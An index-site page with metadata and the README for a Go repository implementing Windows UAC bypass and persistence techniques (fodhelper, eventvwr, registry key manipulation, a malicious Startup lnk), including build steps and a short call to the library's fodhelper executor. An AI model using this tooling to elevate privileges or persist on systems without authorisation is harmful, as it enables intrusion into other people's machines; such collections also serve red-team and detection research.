Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/0x9ef/golang-uacbypasser

Windows UAC bypass techniques implemented and written in Go
https://github.com/0x9ef/golang-uacbypasser

access bypass elevate go golang uac uacbypass windows

Last synced: 3 days ago
JSON representation

Windows UAC bypass techniques implemented and written in Go

Host: GitHub
URL: https://github.com/0x9ef/golang-uacbypasser
Owner: 0x9ef
License: mit
Created: 2019-01-17T10:20:15.000Z (almost 6 years ago)
Default Branch: master
Last Pushed: 2022-03-27T18:20:49.000Z (over 2 years ago)
Last Synced: 2024-12-07T23:50:17.696Z (14 days ago)
Topics: access, bypass, elevate, go, golang, uac, uacbypass, windows
Language: Go
Homepage:
Size: 896 KB
Stars: 211
Watchers: 6
Forks: 38
Open Issues: 1
Metadata Files:
- Readme: README.md
- License: LICENSE

Awesome Lists containing this project

StarryDivineSky - 0x9ef/golang-uacbypasser

README

        # Golang UAC Bypasser

Collection of bypass techiques written in Golang.

Rewrite of - https://github.com/rootm0s/WinPwnage to Golang. 

![Demonstration](image/demo.png)

Techniques are found online, on different blogs and repos here on GitHub. I do not take credit for any of the findings, thanks to all the researchers. 

## Techniques implemented:

### Once

* Using cmstp.exe

* Using computerdefaults.exe

* Using eventvwr.exe

* Using fodhelper.exe

* Using sdcltcontrol.exe

* Using silentcleanup.exe

* Using slui.exe

* Using wsreset.exe

### Persist

* Using Cortana

* Using HKCU registry key manipulations

* Using HKLM registry key manipulations

* Using magnifier.exe

* Using People

* Using Startup folder and malicious lnk file

* Using Userinit registry key manipulations

## How to build: 

  1. `set CGO_ENABLED=0`

  2. `go build -v -a main.go`

## How to use:

You can use this as a library for single method calls to the executor. 

```go

package main 

import (

  once "github.com/0x9ef/golang-uacbypasser/once"

)

func main() {

  path := os.Args[1]

  tstart := time.Now()

  err := once.ExecFodhelper(path)

  if err != nil {

    panic(err)

  }

  tend := time.Now()

  fmt.Printf("Time tooked: %.2f\n", tend.Sub(tstart).Seconds())

}

```

You can use as a program which automatically calling selected methods. 

More information you can found by passing --help flag.

```

main.exe --list --once --technique=TECHNIQUE

```

## If you find error in the code or you want to support project please commit this changes.